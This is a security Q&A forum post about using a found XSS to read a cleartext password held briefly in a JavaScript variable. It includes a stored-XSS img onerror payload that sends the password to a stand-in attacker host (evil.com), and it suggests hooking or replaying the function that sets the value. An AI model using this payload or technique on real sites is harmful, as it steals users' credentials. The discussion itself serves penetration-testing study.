If I put a breakpoint on a Javascript function when I visit a web page and I examine a JS variable that variable contains the cleartext password just for a brief period of time.
I found an XSS and I want to access to the content of that variable I'm trying the following
var i; for(i=1;i<10000;i++){
if(typeof cleartext_password !== 'undefined')
{ cleartext_password;}
}
Anyway it seems the loop doesn't iterate, I just see in the console 4 "undefined reference" errors.
What am I missing?
SOLUTION
I opted for the clean solution as suggested by CBHacking in his answer. The password was stored in clear within the DOM. I was able to leverage a stored XSS to exfiltrate the password as follows:
<img src=x onerror="this.onerror=null;this.src='http://evil.com?mmmh='+window.vuln_name.clear_textpassword>
The obvious answers:
cleartext_password isn't in scope for your little loop then it will never have any value to read; your breakpointed function's local variables are probably not accessible from your XSS payloadThe ugly-hack solution: write your own version of the relevant JS function (the one you're breakpointing) with extra code that dumps the password to somewhere persistent, and/or remove the delete call (if there is one) that erases the variable. Replace the legit function with your modified version (this might require additionally replacing functions that create / define the breakpointed code, depending on how that function is defined and whether it's stored in a visible variable).
The actually good solution: read the function you're breakpointing to see where the cleartext_password variable gets set, and where the function gets its value from (obvious candidates are the DOM, local storage, or an XHR/fetch call to the server). Just execute the same operation (DOM lookup, local storage read, XHR/fetch request, etc.) to retrieve the value directly.